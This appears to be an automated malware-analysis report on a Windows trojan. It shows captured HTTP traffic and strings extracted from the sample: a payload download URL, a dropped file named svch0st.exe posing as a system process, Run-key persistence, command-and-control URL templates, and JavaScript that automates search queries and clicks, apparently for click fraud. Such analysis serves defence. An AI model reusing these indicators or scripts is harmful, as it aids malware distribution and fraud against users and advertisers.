...K...C..6..B...W..w...%..w..Q(-..-v..c.9#.vF......1...L.y....e0...S&
lt;.h....k.s>DJ...x\.B. 5I'i,..Y..zJ .....r......}qq.Q.....~....L&f
.D".#...A.........}.......V.x.R.K5...J....OWs~.t.....'....g.s-...*.9..
...*.M,....Qm...V........e..Tm.........8.....).{..<.....Y...By.=...
..3PId.5!...Zp...PT.......Ue..%@!..04.M.!.6.v.j.%..A.o...vG.....v0m4..
....bZ[..m)d.....q....\F....p......nu..l.......#7|...%...*..1.C<..Y
.f..2W`.m.$.^.. Vf........<.]NH.....x....Y.......^.-.../......Y .@l
..@0/.......]....e.%..Q.....?..;M[..91...U.....K....;:U ......Y..M<<< skipped >>>

GET /Public/js/ext/lazyload/lazyload.js HTTP/1.1

Accept: */*

Referer: hXXp://coinsns.com/index.php?s=/lottery/index/index.html

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.87 Safari/537.36 QQBrowser/9.2.5204.400

Host: coinsns.com

Connection: Keep-Alive

Cookie: PHPSESSID=85qj3gnsemli6jrglevvlkh104


HTTP/1.1 200 OK

Server: nginx/1.0.15

Date: Fri, 20 Jan 2017 09:55:18 GMT

Content-Type: application/javascript

Connection: keep-alive

Last-Modified: Mon, 11 May 2015 15:34:58 GMT

ETag: "a5a25e-d38-515d01ed1cc80"

Accept-Ranges: bytes

Content-Length: 3384
/*! Lazy Load 1.9.3 - MIT license - Copyright 2010-2013 Mika Tuupola *
/..!function(a,b,c,d){var e=a(b);a.fn.lazyload=function(f){function g(
){var b=0;i.each(function(){var c=a(this);if(!j.skip_invisible||c.is("
:visible"))if(a.abovethetop(this,j)||a.leftofbegin(this,j));else if(a.
belowthefold(this,j)||a.rightoffold(this,j)){if(  b>j.failure_limit
)return!1}else c.trigger("appear"),b=0})}var h,i=this,j={threshold:0,f
ailure_limit:0,event:"scroll",effect:"show",container:b,data_attribute
:"original",skip_invisible:!0,appear:null,load:null,placeholder:"data:
image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR
0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBh
XYzh8 PB/AAffA0nNPuCLAAAAAElFTkSuQmCC"};return f&&(d!==f.failurelimit&
&(f.failure_limit=f.failurelimit,delete f.failurelimit),d!==f.effectsp
eed&&(f.effect_speed=f.effectspeed,delete f.effectspeed),a.extend(j,f)
),h=j.container===d||j.container===b?e:a(j.container),0===j.event.inde
xOf("scroll")&&h.bind(j.event,function(){return g()}),this.each(functi
on(){var b=this,c=a(b);b.loaded=!1,(c.attr("src")===d||c.attr("src")==
=!1)&&c.is("img")&&c.attr("src",j.placeholder),c.one("appear",function
(){if(!this.loaded){if(j.appear){var d=i.length;j.appear.call(b,d,j)}a
("<img />").bind("load",function(){var d=c.attr("data-" j.data_a
ttribute);c.hide(),c.is("img")?c.attr("src",d):c.css("background-image
","url('" d "')"),c[j.effect](j.effect_speed),b.loaded=!0;var e=a.grep
(i,function(a){return!a.loaded});if(i=a(e),j.load){var f=i.length;<<< skipped >>>

GET /index.php?s=/lottery/index/getlast.html HTTP/1.1

X-Requested-With: XMLHttpRequest

Accept: application/json, text/javascript, */*; q=0.01

Referer: hXXp://coinsns.com/index.php?s=/lottery/index/index.html

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.87 Safari/537.36 QQBrowser/9.2.5204.400

Host: coinsns.com

Connection: Keep-Alive

Cookie: PHPSESSID=85qj3gnsemli6jrglevvlkh104; _ga=GA1.2.150513197.1484906118; _gat=1


HTTP/1.1 200 OK

Server: nginx/1.0.15

Date: Fri, 20 Jan 2017 09:55:23 GMT

Content-Type: application/json; charset=utf-8

Connection: keep-alive

X-Powered-By: PHP/5.3.14

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

Pragma: no-cache

Content-Length: 15

{"left_time":0}HTTP/1.1 200 OK..Server: nginx/1.0.15..Date: Fri, 20 Ja
n 2017 09:55:23 GMT..Content-Type: application/json; charset=utf-8..Co
nnection: keep-alive..X-Powered-By: PHP/5.3.14..Expires: Thu, 19 Nov 1
981 08:52:00 GMT..Cache-Control: no-store, no-cache, must-revalidate, 
post-check=0, pre-check=0..Pragma: no-cache..Content-Length: 15..{"lef
t_time":0}....

GET /index.php?s=/lottery/index/btc_rate.html HTTP/1.1

X-Requested-With: XMLHttpRequest

Accept: */*

Referer: hXXp://coinsns.com/index.php?s=/lottery/index/index.html

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.87 Safari/537.36 QQBrowser/9.2.5204.400

Host: coinsns.com

Connection: Keep-Alive

Cookie: PHPSESSID=85qj3gnsemli6jrglevvlkh104; _ga=GA1.2.150513197.1484906118; _gat=1


HTTP/1.1 200 OK

Server: nginx/1.0.15

Date: Fri, 20 Jan 2017 09:55:35 GMT

Content-Type: text/html

Connection: keep-alive

X-Powered-By: PHP/5.3.14

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

Pragma: no-cache

Content-Length: 0

HTTP/1.1 200 OK..Server: nginx/1.0.15..Date: Fri, 20 Jan 2017 09:55:35
 GMT..Content-Type: text/html..Connection: keep-alive..X-Powered-By: P
HP/5.3.14..Expires: Thu, 19 Nov 1981 08:52:00 GMT..Cache-Control: no-s
tore, no-cache, must-revalidate, post-check=0, pre-check=0..Pragma: no
-cache..Content-Length: 0..

The Trojan connects to the servers at the folowing location(s):

%original file name%.exe_2956:

.rsrc

t$(SSh

~%UVW

tGHt.Ht&

u$SShe

Bv.SCv=kAv?lCv

user32.dll

shell32.dll

kernel32.dll

MsgWaitForMultipleObjects

?svch0st.exe

\svch0st.exe

hXXp://update-10042197.cos.myqcloud.com/date/11.exe

\ESPI11.dll

.text

`.rdata

@.data

.inidata

@.reloc

CNotSupportedException

CCmdTarget

commctrl_DragListMsg

COMCTL32.DLL

__MSVCRT_HEAP_SELECT

KERNEL32.dll

USER32.dll

RegCloseKey

RegOpenKeyExA

ADVAPI32.dll

WS2_32.dll

COMCTL32.dll

GetCPInfo

UnhookWindowsHookEx

SetWindowsHookExA

GetKeyState

SetViewportOrgEx

OffsetViewportOrgEx

SetViewportExtEx

ScaleViewportExtEx

GDI32.dll

WINSPOOL.DRV

comdlg32.dll

SHELL32.dll

SWNPM.dll

.PAVCException@@

.PAVCArchiveException@@

.PAVCObject@@

.PAVCSimpleException@@

.PAVCMemoryException@@

.?AVCNotSupportedException@@

.?AVCCmdTarget@@

.?AVCCmdUI@@

.?AVCTestCmdUI@@

>$>(>,>0>4>8><>@>

0F0g0m0

<"<=<^<~<

9$9(9,90989

<0=4=8=<=

<a href="hXXp://VVV.eyybc.com/" target="_blank" style="font-family: Tahoma, Verdana;

font-size: 11px; text-decoration: none;">CHM files by <b>Eyybc<!--227-->.Com</b> convert HTM.</a>

<a href="hXXp://VVV.eyybc.com" target="_blank" style="font-family: Tahoma, Verdana;

font-size: 11px; text-decoration: none;">E language communication<!--227--> at: hXXp://VVV.eyybc.com</a>

2018-11-23 14:15:58|9920

2018-10-25 10:14:13|100

game.exe

HTTP/1.1 200 OK

X-Powered-By: ASP.NET

2018-11-23 14:15:58|99910

pic_n.asp

pic.asp

report.asp

#in_password

:31367275

%d&&'

123456789

00003333

deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly

inflate 1.1.3 Copyright 1995-1998 Mark Adler

F%*.*f

Afx:%x:%x:%x:%x:%x

Afx:%x:%x

Please contact the application's support team for more information.

- Attempt to initialize the CRT more than once.

- CRT not initialized

- floating point support not loaded

?#%X.y

Broken pipe

Inappropriate I/O control operation

Operation not permitted

GetProcessWindowStation

USER32.DLL

operator

Shell32.dll

Mpr.dll

Advapi32.dll

User32.dll

Gdi32.dll

Kernel32.dll

(&07-034/)7 '

?? / %d]

%d / %d]

.PAVCFileException@@

: %d]

(*.*)|*.*||

(*.WAV;*.MID)|*.WAV;*.MID|WAV

(*.WAV)|*.WAV|MIDI

(*.MID)|*.MID|

(*.txt)|*.txt|

(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG

(*.JPG)|*.JPG|PNG

(*.PNG)|*.PNG|BMP

(*.BMP)|*.BMP|GIF

(*.GIF)|*.GIF|

(*.ICO)|*.ICO|

(*.CUR)|*.CUR|

%s:%d

windows

.PAVCNotSupportedException@@

out.prn

(*.prn)|*.prn|

%d.%d

%d/%d

1.6.9

unsupported zlib version

png_read_image: unsupported transformation

%d / %d

Bogus message code %d

libpng error: %s

libpng warning: %s

1.1.3

bad keyword

libpng does not support gamma background rgb_to_gray

Palette is NULL in indexed image

(%d-%d):

%ld%c

%s\ESPI%d.dll

hXXp://dywt.com.cn

service@dywt.com.cn

 86(0411)88995834

 86(0411)88995831

Windows

(ESPINN.dll(NN

This is a runtime library file for EPL applications. The EPL is a software development environment. For details please visit VVV.dywt.com.cn/info

CallerInfoCopyCmd

SetIPPort

GetIPPort

"C:\Windows\System32\ESPI11.dll"

ProviderInstallCopyCmd

SockDataCopyCmd

SockAddrCopyCmd

enetintercept_fnSockAddrSetIPPort

enetintercept_fnSockAddrGetIPPort

enetintercept_fnInstallCopyCmd

enetintercept_fnSockDataCopyCmd

enetintercept_fnSockAddrCopyCmd

enetintercept_fnCallerInfoCopyCmd

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)

HTTP/1.0

%s <%s>

Reply-To: %s

From: %s

To: %s

Subject: %s

Date: %s

Cc: %s

%a, %d %b %Y %H:%M:%S

SMTP

.PAVCResourceException@@

.PAVCUserException@@

zcÁ

c:\%original file name%.exe

GetWindowsDirectoryA

GetConsoleOutputCP

WinExec

GetProcessHeap

RegOpenKeyA

RegEnumKeyA

RegCreateKeyExA

RegDeleteKeyA

GetViewportOrgEx

GetViewportExtEx

ShellExecuteA

CreateDialogIndirectParamA

HttpOpenRequestA

InternetCanonicalizeUrlA

InternetCrackUrlA

HttpQueryInfoA

HttpSendRequestA

 %F<F0

#include "l.chs\afxres.rc" // Standard components

<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity name="E.App" processorArchitecture="x86" version="5.2.0.0" type="win32"/><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"> <security> <requestedPrivileges> <requestedExecutionLevel level="requireAdministrator" uiAccess="false"/> </requestedPrivileges> </security></trustInfo></assembly>PAD

KERNEL32.DLL

ole32.dll

OLEAUT32.dll

RASAPI32.dll

WININET.dll

WINMM.dll

1, 1, 0, 0

ESPI11.dll

mscoree.dll

1.0.0.0

(hXXp://VVV.dywt.com.cn)

%original file name%.exe_2956_rwx_00401000_0012D000:

t$(SSh

~%UVW

tGHt.Ht&

u$SShe

Bv.SCv=kAv?lCv

user32.dll

shell32.dll

kernel32.dll

MsgWaitForMultipleObjects

?svch0st.exe

\svch0st.exe

hXXp://update-10042197.cos.myqcloud.com/date/11.exe

\ESPI11.dll

.text

`.rdata

@.data

.inidata

.rsrc

@.reloc

CNotSupportedException

CCmdTarget

commctrl_DragListMsg

COMCTL32.DLL

__MSVCRT_HEAP_SELECT

KERNEL32.dll

USER32.dll

RegCloseKey

RegOpenKeyExA

ADVAPI32.dll

WS2_32.dll

COMCTL32.dll

GetCPInfo

UnhookWindowsHookEx

SetWindowsHookExA

GetKeyState

SetViewportOrgEx

OffsetViewportOrgEx

SetViewportExtEx

ScaleViewportExtEx

GDI32.dll

WINSPOOL.DRV

comdlg32.dll

SHELL32.dll

SWNPM.dll

.PAVCException@@

.PAVCArchiveException@@

.PAVCObject@@

.PAVCSimpleException@@

.PAVCMemoryException@@

.?AVCNotSupportedException@@

.?AVCCmdTarget@@

.?AVCCmdUI@@

.?AVCTestCmdUI@@

>$>(>,>0>4>8><>@>

0F0g0m0

<"<=<^<~<

9$9(9,90989

<0=4=8=<=

<a href="hXXp://VVV.eyybc.com/" target="_blank" style="font-family: Tahoma, Verdana;

font-size: 11px; text-decoration: none;">CHM files by <b>Eyybc<!--227-->.Com</b> convert HTM.</a>

<a href="hXXp://VVV.eyybc.com" target="_blank" style="font-family: Tahoma, Verdana;

font-size: 11px; text-decoration: none;">E language communication<!--227--> at: hXXp://VVV.eyybc.com</a>

2018-11-23 14:15:58|9920

2018-10-25 10:14:13|100

game.exe

HTTP/1.1 200 OK

X-Powered-By: ASP.NET

2018-11-23 14:15:58|99910

pic_n.asp

pic.asp

report.asp

#in_password

:31367275

%d&&'

123456789

00003333

deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly

inflate 1.1.3 Copyright 1995-1998 Mark Adler

F%*.*f

Afx:%x:%x:%x:%x:%x

Afx:%x:%x

Please contact the application's support team for more information.

- Attempt to initialize the CRT more than once.

- CRT not initialized

- floating point support not loaded

?#%X.y

Broken pipe

Inappropriate I/O control operation

Operation not permitted

GetProcessWindowStation

USER32.DLL

operator

Shell32.dll

Mpr.dll

Advapi32.dll

User32.dll

Gdi32.dll

Kernel32.dll

(&07-034/)7 '

?? / %d]

%d / %d]

.PAVCFileException@@

: %d]

(*.*)|*.*||

(*.WAV;*.MID)|*.WAV;*.MID|WAV

(*.WAV)|*.WAV|MIDI

(*.MID)|*.MID|

(*.txt)|*.txt|

(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG

(*.JPG)|*.JPG|PNG

(*.PNG)|*.PNG|BMP

(*.BMP)|*.BMP|GIF

(*.GIF)|*.GIF|

(*.ICO)|*.ICO|

(*.CUR)|*.CUR|

%s:%d

windows

.PAVCNotSupportedException@@

out.prn

(*.prn)|*.prn|

%d.%d

%d/%d

1.6.9

unsupported zlib version

png_read_image: unsupported transformation

%d / %d

Bogus message code %d

libpng error: %s

libpng warning: %s

1.1.3

bad keyword

libpng does not support gamma background rgb_to_gray

Palette is NULL in indexed image

(%d-%d):

%ld%c

%s\ESPI%d.dll

hXXp://dywt.com.cn

service@dywt.com.cn

 86(0411)88995834

 86(0411)88995831

Windows

(ESPINN.dll(NN

This is a runtime library file for EPL applications. The EPL is a software development environment. For details please visit VVV.dywt.com.cn/info

CallerInfoCopyCmd

SetIPPort

GetIPPort

"C:\Windows\System32\ESPI11.dll"

ProviderInstallCopyCmd

SockDataCopyCmd

SockAddrCopyCmd

enetintercept_fnSockAddrSetIPPort

enetintercept_fnSockAddrGetIPPort

enetintercept_fnInstallCopyCmd

enetintercept_fnSockDataCopyCmd

enetintercept_fnSockAddrCopyCmd

enetintercept_fnCallerInfoCopyCmd

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)

HTTP/1.0

%s <%s>

Reply-To: %s

From: %s

To: %s

Subject: %s

Date: %s

Cc: %s

%a, %d %b %Y %H:%M:%S

SMTP

.PAVCResourceException@@

.PAVCUserException@@

zcÁ

c:\%original file name%.exe

GetWindowsDirectoryA

GetConsoleOutputCP

WinExec

GetProcessHeap

RegOpenKeyA

RegEnumKeyA

RegCreateKeyExA

RegDeleteKeyA

GetViewportOrgEx

GetViewportExtEx

ShellExecuteA

CreateDialogIndirectParamA

HttpOpenRequestA

InternetCanonicalizeUrlA

InternetCrackUrlA

HttpQueryInfoA

HttpSendRequestA

1, 1, 0, 0

ESPI11.dll

mscoree.dll

KERNEL32.DLL

svch0st.exe_2080:

`.rsrc

xSSSh

FTPjKS

FtPj;S

C.PjRV

28^%u

>8_%u

Bv.SCv"

RegOpenKeyTransactedW

RegCreateKeyTransactedW

RegDeleteKeyTransactedW

FRegDeleteKeyExW

crash.desc

urls

maxExeTime

CURLDetector

NtQueryValueKey

NtOpenKeyEx

CertOpenStore

CommitUrlCacheEntryA

CommitUrlCacheEntryW

TaskDialogIndirect

Comdlg32.dll

Kernel32.dll

Shell32.dll

Gdi32.dll

DSound.dll

dfdll.dll

Credui.dll

User32.dll

Crypt32.dll

Wintrust.dll

Wininet.dll

Comctl32.dll

Winmm.dll

SHELL32.dll

NTDLL.DLL

Shell32.dll

HTTP_STATUS_VERSION_NOT_SUP

HTTP_STATUS_GATEWAY_TIMEOUT

HTTP_STATUS_SERVICE_UNAVAIL

HTTP_STATUS_BAD_GATEWAY

HTTP_STATUS_NOT_SUPPORTED

HTTP_STATUS_SERVER_ERROR

HTTP_STATUS_RETRY_WITH

HTTP_STATUS_UNSUPPORTED_MEDIA

HTTP_STATUS_URI_TOO_LONG

HTTP_STATUS_REQUEST_TOO_LARGE

HTTP_STATUS_PRECOND_FAILED

HTTP_STATUS_LENGTH_REQUIRED

HTTP_STATUS_GONE

HTTP_STATUS_CONFLICT

HTTP_STATUS_REQUEST_TIMEOUT

HTTP_STATUS_PROXY_AUTH_REQ

HTTP_STATUS_NONE_ACCEPTABLE

HTTP_STATUS_BAD_METHOD

HTTP_STATUS_NOT_FOUND

HTTP_STATUS_FORBIDDEN

HTTP_STATUS_PAYMENT_REQ

HTTP_STATUS_DENIED

HTTP_STATUS_BAD_REQUEST

INET_E_INVALID_CERTIFICATE

INET_E_INVALID_URL

Visual C   CRT: Not enough memory to complete call to strerror.

portuguese-brazilian

Broken pipe

Inappropriate I/O control operation

Operation not permitted

operator

GetProcessWindowStation

1.2.8

-_.!~*'():

inflate 1.2.8 Copyright 1995-2013 Mark Adler

.?AVIHttpSession@@

.?AVITaskReporter@@

.?AUIExecutorInfo@@

.?AV?$sp_counted_impl_p@VFeedbackReporter@@@detail@boost@@

.?AV?$ObservableAsync@VFeedbackReporter@@@@

.?AV?$enable_shared_from_this@VFeedbackReporter@@@boost@@

.?AVFeedbackReporter@@

.?AVIHttpProxyInfo@@

.?AVIHttpConfigurator@@

.?AV?$sp_counted_impl_p@VKClientInnerProcessor@CTFExecuterDlg@@@detail@boost@@

.?AVKClientInnerProcessor@CTFExecuterDlg@@

.?AVCTFExecuterDlg@@

.?AV?$CAxDialogImpl@VCTFExecuterDlg@@VCWindow@ATL@@@ATL@@

.?AVInternetProtocolSinkTM@PassthroughAPP@@

.?AVIInternetProtocolSinkImpl@PassthroughAPP@@

.?AV?$InternetProtocolSinkWithSP@VFilterSink@@@PassthroughAPP@@

.?AUIHttpNegotiate@@

.?AV?$CComObjectSharedRef@VFilterSink@@@PassthroughAPP@@

.?AV?$InternetProtocolFilter@V?$CustomSinkFilter@VFilterSink@@@PassthroughAPP@@@PassthroughAPP@@

.?AVIInternetProtocolImpl@PassthroughAPP@@

.?AUIWinInetHttpInfo@@

.?AV?$CustomSinkFilter@VFilterSink@@@PassthroughAPP@@

.?AV?$Singleton@VCURLDetector@@@@

.?AVCURLDetector@@

.?AV?$IDispatchImpl@UIATLBrowserHost@@$1?IID_IATLBrowserHost@@3U_GUID@@B$1?LIBID_TFExecuter4Lib@@3U3@B$00$0A@VCComTypeInfoHolder@ATL@@@ATL@@

.?AVAlxLocalExecuter@@

.?AVCExecuterEngine@@

.?AV?$IDispEventImpl@$0GG@VCHostATLHtmCtrl@@$1?DIID_DWebBrowserEvents2@@3U_GUID@@B$1?LIBID_SHDocVw@@3U3@B$00$00VCComTypeInfoHolder@ATL@@@ATL@@

.?AV?$IDispEventSimpleImpl@$0GG@VCHostATLHtmCtrl@@$1?DIID_DWebBrowserEvents2@@3U_GUID@@B@ATL@@

.?AV?$_IDispEventLocator@$0GG@$1?DIID_DWebBrowserEvents2@@3U_GUID@@B@ATL@@

.?AVCExecuterFlash@@

.?AVCExecuterEarn@@

.?AVCExecuterFlowBase@@

.?AVCExecuterKWConfig@@

.?AVCExecuterKWBase@@

.?AVCExecuterFlow@@

.?AVCExecuterPage@@

.?AVCExecuterPopup@@

zcÁ

.?AV?$sp_counted_impl_p@VHttpSession@@@detail@boost@@

.?AV?$ObservableSync@VHttpSession@@@@

.?AV?$enable_shared_from_this@VHttpSession@@@boost@@

.?AVThreadID2Request@HttpSession@@

.?AVThreadID2Param@?$AsyncFunctionCaller@VRequestInfo@HttpSession@@V12@@@

.?AVHttpSession@@

WinExec

GetCPInfo

GetProcessHeap

RegCreateKeyExW

RegCloseKey

RegOpenKeyW

RegOpenKeyExW

RegDeleteKeyW

RegQueryInfoKeyW

RegEnumKeyExW

SHDeleteKeyW

UrlMkSetSessionOption

EnumChildWindows

SetWindowsHookExW

UnhookWindowsHookEx

CreateDialogIndirectParamW

HttpQueryInfoW

HttpSendRequestW

InternetCanonicalizeUrlW

InternetCrackUrlW

HttpOpenRequestW

HttpAddRequestHeadersW

(>>>>?@@@

-& #>>##9#-&

% 35:1%S^/@0

yRN.Rx&N*3E03

i( LFaO.E.IX2jR.R]h)8R6_S])0J>Rs;@

-8000?.0

F^H0(;%3S5%

.text

`.rdata

@.data

.rsrc

@.reloc

35:1%S^/@0

yRN.Rx&N*3E

LFaO.E.IX2jR8]h)8

.MD{#

KERNEL32.DLL

ADVAPI32.dll

COMDLG32.dll

CRYPT32.dll

dbghelp.dll

DSOUND.dll

GDI32.dll

ole32.dll

OLEAUT32.dll

pdh.dll

PSAPI.DLL

SHLWAPI.dll

urlmon.dll

USER32.dll

VERSION.dll

WININET.dll

WINMM.dll

WINTRUST.dll

WS2_32.dll

%s\%s\%s

cfg.ini

%s%sSCConfig.dat

%s\%s

Software\Microsoft\Windows\CurrentVersion\Run

Advapi32.dll

HKEY_CLASSES_ROOT

HKEY_CURRENT_USER

HKEY_LOCAL_MACHINE

HKEY_USERS

HKEY_PERFORMANCE_DATA

HKEY_DYN_DATA

HKEY_CURRENT_CONFIG

log.txt

6.%s.%d.5

6.%s.%d.%d

r%s=%s

HKEY_PERFORMANCE_NLSTEXT

HKEY_PERFORMANCE_TEXT

ThreadID(%d) %s :

ThreadID(%d)[%s] %s :

d-d-d d:d:d.d

%s_%s_%d

%d.%d.%d.%d

xxxxxxxxxxxxxxxx

can not start Blink core ! ExitCode is %d.

can not start Blink core ! ErrorCode is %d.

DeleteFolder %s

RemoteUpdater : %s

content_shell.exe

%s%s%s%s

%s\%s\

URLConfiguration.xml

Sync config data to server: %s

=%s&r

=%d&p

=%d&c

=%s&t

SaveCfg Response: %s

EncrypterKeyList

%s^%d^%d^

%s|%d

hXXp://%s/redirect/CFGUpdate?number=%s&checksum=%s&cid=%s&rd=%d

zipUrl

xml.dat

polyUrl

Trans response to string:%s

New process forbid : Tasktype limit (%d) overflow

New process forbid : Auto level max count((%d) overflow

New process forbid : Running max count(%d) overflow

New process forbid : CPU Max(%d) overflow

New task(PID: %d)Processed! Param is %s

Create task processed error! ErrorCode is %d.

Can not find Executor! (path : %s)

FetchTaskList : Trans response to string: %s

aws:UrlInfoResult

ProxyByPass

ProxyPassword

hXXp://%s/clt/jobid/%s

hid=%s&cid=%s&jid=%s

RequestType : %d.Trans response to string:%s

Translate HeartBeat Response to string:%s

i=%s&si=%s

To fetch backup server domain form : %s

URLConfig

Add new server domain %s

ap%d.%s

hXXp://img01.taobaocdn.com/imgextra/i1/58465055/T2EoRRXbJdXXXXXXXX_!!58465055.jpg

hXXp://img04.taobaocdn.com/imgextra/i4/58465055/T2SyJhXoRNXXXXXXXX_!!58465055.jpg

hXXp://img03.taobaocdn.com/imgextra/i3/58465055/T2BulKXdhcXXXXXXXX_!!58465055.jpg

hXXp://%s/ts/f4/

hXXp://%s/ts/f3.1/

hXXp://%s/ts/f2.2/

hXXp://%s/ts/f7/

hXXp://%s/as/c/f9/

hXXp://%s/as/c/f8/

hXXp://%s/as/c/f10.1/

hXXp://%s/as/2/h5/

hXXp://%s/as/2/h1/

hXXp://%s/as/2/h2/

hXXp://%s/as/c/f11/

hXXp://%s/as/2/h4/

hXXp://%s/as/2/h3/

hXXp://%s/as/c/f5/

hXXp://

Current count of task in taskContainer is %d

Render task's param is %s

ghXXp://VVV.baidu.com/

https

\index.dat

%s\Cookies\%d

type:%d,

shell.explorer

{0d43fe01-f093-11cf-8940-00a0c9054228}

{13709620-c279-11ce-a49e-444553540000}

{00000566-0000-0010-8000-00aa006d2ea4}

{093ff999-1ea0-4079-9525-9614c3504b74}

{72c24dd5-d70a-438b-8a42-98424b88afb8}

{6bf52a52-394a-11d3-b153-00c04f79faa6}

{2d360201-fff5-11d1-8d03-00a0c959bc0a}

{e05bc2a3-9a46-4a32-80c9-023a473f5b23}

XMLHTTP

1400:0;1406:3;1803:0;DisplayTrustAlertDlg:0;MaxHttpRedirects:10

bmp;rar;wma;wav;mp3;mp4;mid;midi;asf;exe;avi;dat;bat;iso;mpeg;mpg;mpga;ra;rar;dll;ogg;acc;ape;reg;rm;rmvb;tar;wma;wmp;wmv;mov;zip;3gp;chm;mdf;torrent;jar;msi;dmg;apk;crx;pdf;7z;mkv;doc;docx;xls;xlsx;ppt;pptx;mdb;xps

runtask.dat

liuliangbao.cn

sap1200.com

mshtml.dll

%s\%ld

lShell32.DLL

hXXp://%s:%d

hXXp://%s

.html

hXXp://%s/%d/

GetClickUrl

IsNextPageUrl

function GetClickUrl(target,match){if(target.indexOf('baidu')>0){var tables=document.getElementsByTagName('div');for(var i=0;i<tables.length;i  ){var table=tables[i];if(table.className.indexOf('c-container')!=-1){var a=table.getElementsByTagName('a')[0];var ele=null;var spans=table.getElementsByTagName('span');if(spans.length>0){ele=spans[0]}else{var fonts=table.getElementsByTagName('font');if(fonts.length>2){ele=fonts[2]}}if(ele){var text=ele.innerText.split(' ',2)[0];if(text.indexOf(match)!=-1){return a.href}}}}return''}else return null}

function DoMoreThing(target){if(target.indexOf('google')>0){var table=document.getElementsByTagName('div');for(var i=0;i<table.length;i  ){if(table[i].className=='gstl_0 sbdd_a'){table[i].style.display='none';}}}}

function IsNextPageUrl(target,url,anchor) { return anchor.indexOf('

')!=-1; }

function IsDisallowDomain(target,domain,path){if(target.indexOf('baidu')>0){if(domain.indexOf('cbjs.baidu')!=-1||domain.indexOf('cpro.baidu')!=-1||domain.indexOf('hm.baidu')!=-1)return true;return domain.indexOf('baidu')==-1&&domain.indexOf('bdstatic')==-1};else if(target.indexOf('soso')>0)return domain.indexOf('soso')==-1&&domain.indexOf('qstatic')==-1&&domain.indexOf('qq.com')==-1;else if(target.indexOf('sogou')>0)return domain.indexOf('sogou')==-1;else if(target.indexOf('google')>0)return domain.indexOf('google')==-1&&domain.indexOf('gstatic')==-1;else if(target.indexOf('youdao')>0)return domain.indexOf('youdao')==-1&&domain.indexOf('ydstatic')==-1;else if(target.indexOf('bing')>0)return domain.indexOf('bing')==-1||path.indexOf('hprichbg')!=-1;else if(target.indexOf('yahoo')>0)return domain.indexOf('yahoo')==-1&&domain.indexOf('yimg')==-1&&domain.indexOf('aliyun')==-1&&domain.indexOf('tanx')==-1&&domain.indexOf('limgs')==-1;else if(target.indexOf('haosou')>0)return domain.indexOf('360')==-1&&domain.indexOf('qhupdate')==-1&&domain.indexOf('qhimg')==-1&&domain.indexOf('haosou')==-1}

function IsSearchButton(target,type,name,id,clas){if(target.indexOf('baidu')>0)return type=='submit'&&id=='su';else if(target.indexOf('soso')>0)return type=='submit'&&(id=='stb'||clas=='s_button'||id=='searchHeaderSubmit');else if(target.indexOf('sogou')>0)return type=='submit'&&(id=='stb'||id=='searchBtn');else if(target.indexOf('google')>0){if(target.indexOf('#0#')>0)return type=='submit'&&name=='btnK';else return type=='submit'&&name=='btnG'}else if(target.indexOf('youdao')>0)return type=='submit'&&(id=='qb'||clas=='s-btn');else if(target.indexOf('bing')>0)return type=='submit'&&id=='sb_form_go';else if(target.indexOf('yahoo')>0)return type=='submit';else if(target.indexOf('haosou')>0)return type=='submit'&&(id=='search-button'||id=='su')}

function IsSearchInput(target,type,name,id,clas){if(target.indexOf('baidu')>0)return type=='text'&&id=='kw';else if(target.indexOf('soso')>0)return type=='text'&&(id=='query'||id=='upquery')&&name=='query';else if(target.indexOf('sogou')>0)return type=='text'&&(id=='query'||id=='upquery')&&name=='query';else if(target.indexOf('google')>0)return type=='text'&&id=='lst-ib'&&name=='q';else if(target.indexOf('youdao')>0)return type=='text'&&id=='query'&&name=='q';else if(target.indexOf('bing')>0)return id=='sb_form_q'&&name=='q';else if(target.indexOf('yahoo')>0)return type=='text'&&(id=='ysearchq'||id=='qtop')&&name=='q';else if(target.indexOf('haosou')>0)return type=='text'&&name=='q'}

127.0.0.1

192.168.255.255

192.168.0.0

172.31.255.255

172.16.0.0

10.255.255.255

10.0.0.0

bl.dat

.tmall.

.taobao.

blhash.dat

%s%s%s

%s%s:%d%s

hXXps://

http:

shlwapi.dll

openurl

ddd

rq=%d&ss=%dx%d&t=%d&ttl=%d&wid=%d&locale=%s

{%d~}_

{%d_%d}_

{%d}_

onkeydown

mscoree.dll

- Attempt to initialize the CRT more than once.

- CRT not initialized

- floating point support not loaded

WUSER32.DLL

ddd

ntdll.dll

%d.%d.%d

%s(ActiveCore:%d)

Microsoft Windows 2000

Microsoft Windows XP

Microsoft Windows Server 2003 R2

Microsoft Windows Server 2003

Microsoft Windows XP Professional x64 Edition

Microsoft Windows 8.1

Microsoft Windows Server 2012 R2

Microsoft Windows 8

Microsoft Windows Server 2008 R2

